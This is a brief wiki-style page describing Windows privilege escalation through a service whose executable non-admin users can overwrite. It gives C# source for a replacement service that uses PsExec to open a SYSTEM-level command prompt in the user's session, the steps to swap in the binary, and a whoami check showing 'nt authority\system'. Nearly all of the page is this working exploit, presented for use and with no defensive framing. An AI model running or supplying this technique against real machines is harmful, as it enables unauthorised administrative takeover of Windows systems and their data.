Privilege escalation
De Banane Atomic
Aller à la navigationAller à la recherche
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
Program.cs |
class Program { static void Main(string[] args) { ServiceBase.Run(new ServiceBase[] { new Service() }); } } public class Service : ServiceBase { protected override void OnStart(string[] args) { Thread.Sleep(60000); // Windows services run in session 0 and user account runs in session 1. // use sysinternals' PsExec to run cmd.exe in session 1. Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe"); } } |
- Replace the executable of the Windows service by the compiled application.
- A command prompt will be launched when the Windows service starts.
whoami REM nt authority\system |